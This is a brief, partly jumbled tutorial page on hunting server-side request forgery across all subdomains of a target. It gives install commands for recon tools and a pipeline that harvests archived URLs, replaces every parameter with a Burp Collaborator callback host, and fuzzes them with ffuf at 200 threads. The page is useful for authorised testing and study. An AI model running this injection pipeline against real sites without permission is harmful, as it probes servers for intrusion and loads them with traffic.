Comment on page
Finding SSRF (all scope)
The goal of this laboratory is to use some tools to collect all subdomains from a specific domain, all the URLs and parameters, and retrieve some results using the burp collaborator utility.
How to install it:
GO111MODULE=on go get -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder
How to install it:
go get -u github.com/tomnomnom/qsreplace
gau: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
How to install it:
GO111MODULE=on go get -u -v github.com/lc/gau
How to install it:
go get github.com/tomnomnom/waybackurls
How to install it:
go get -u github.com/tomnomnom/gf
List to exclude:
grep -v "\.css?ver" | grep -v "\.js" | grep -v "\.png" | grep -v "\.woff" | grep "collaborator"
How to install it:
go get -u github.com/ffuf/ffuf
In Scope: *.example.com
gau -subs example.com; subfinder -d example.com -silent | waybackurls | sort -u > output.txt
cat output.txt | qsreplace "http://xxxxxxxxxxx.burpcollaborator.net" >> fuzz_list.txt
ffuf -c -w fuzz_list.txt -u FUZZ -t 200 -r
To collect all URLs from several sources:
Last modified 2yr ago